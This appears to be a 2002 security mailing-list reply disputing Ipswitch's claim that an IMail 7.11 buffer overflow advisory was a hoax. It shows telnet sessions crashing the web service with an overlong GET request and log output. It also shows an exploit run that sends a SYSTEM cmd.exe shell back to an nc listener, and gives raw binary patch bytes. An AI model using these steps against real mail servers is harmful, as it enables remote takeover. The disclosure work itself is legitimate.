uh, ok
first of all, I haven't been able to respond to any mail since saturday
afternoon as some nice person/vendor filed a phony abuse report with the
intelligent people of yahoo inc., and had my account suspended and banned..
if you sent any email since saturday, please resend it here.. I'm sure I'll
have a week or so to read it before I am ABUSE REPORT H4XED..
first off, maybe the exploit isn't working on your system.. hmm, possible I
guess?.. the described situation is still quite repeatable so what the hell:
xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 200 Created
Date: Mon, 29 Jul 2002 19:20:41 GMT
Server: Ipswitch-IMail/7.11
Last-Modified: Mon, 29 Jul 2002 19:20:41 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires:
Content-Type: text/html
Content-Length: 5143
[....]
hmm, looks like IMail 7.11 to me? how about you?
xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
HTTP/1.0
Connection closed by foreign host.
uh oh, that isn't supposed to happen!@ let's chex those logs!
20020729 162041 Info - 192.168.0.1 GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1 GET
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383
from 192.168.0.1.
hey, look mom.. a dead thread! looks like an overflow to me, let's use that
elite exploit I found on bugtraq!@
xx@xxx:~$ ./imailexp 192.168.0.2 8383 192.168.0.1 3333
IMail 7.11 remote exploit (SYSTEM level)
2c79cbe14ac7d0b8472d3f129fa1df55 ([EMAIL PROTECTED])
ret: 0x10012490 (IMailsec.dll v.2.6.17.28)
connecting...done.
dumping payload...done.
cmd.exe spawned to [192.168.0.1:3333]
xx@xxx:~$ nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
D:\WINNT\system32>
seems to work fine to me.. what the hell is going on at ipswitch? is it time
to fire someone?
as for the patch being a vulnerability.. the binary was compiled with the
default switches using Borland C++ 5.5 so that's why it's large.. but it's
the same damn source, so fuck the binary then.. compile from the source:
char p1[] = {0x00,0x30};
//extend text section to make room for our code
char p2[] = {0xe8,0xa1,0x98,0x04,0x00,0x90};
//on a command request, CALL 4A345E;NOP
char p3[] =
{0x81,0xbc,0x24,0x58,0x03,0x00,0x00,0x47,0x45,0x54,0x20,0x75,0x08,0xc6,0x84,0x24,0xb2,0x03,0x00,0x00,0x00,0x8d,0x85,0xf0,0xed,0xff,0xff,0xc3};
//disassembly below
.text:004A345E cmp [esp+arg_354], 20544547h
.text:004A3469 jnz short loc_4A3473
//is the argument "USER"? no? get out of this shit
.text:004A346B mov [esp+arg_3AE], 0
//yes? limit argument to 90 bytes
.text:004A3473 loc_4A3473: ; CODE XREF:
sub_4A345E+B�j
.text:004A3473 lea eax, [ebp-1210h]
//shit we ran over to get here
.text:004A3479 retn
huh? looks like a backdoor to me..
@!$?@!?$@!?%2@$42144@!$@!%?@!$@!%?@!$,
2c79cbe14ac7d0b8472d3f129fa1df55
>Hello,
>In message 284465 there is an "exploit" of IMail Server from Ipswitch
>listed.
>http://online.securityfocus.com/archive/1/284465
>We have been unable to duplicate the problem and the code attached to >the
>above message is unknown in nature. We suspect that the "patch" >released
>in the message is actually designed to open a vulnerability. >At this time
>we are advising our users that this advisory is a hoax >and to not apply
>the patch. I would like to request that the message >be removed to prevent
>further confusion. Thank you.
>John Korsak
>Product Marketing Manager, IMail Server
>(781) 676-5789
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx
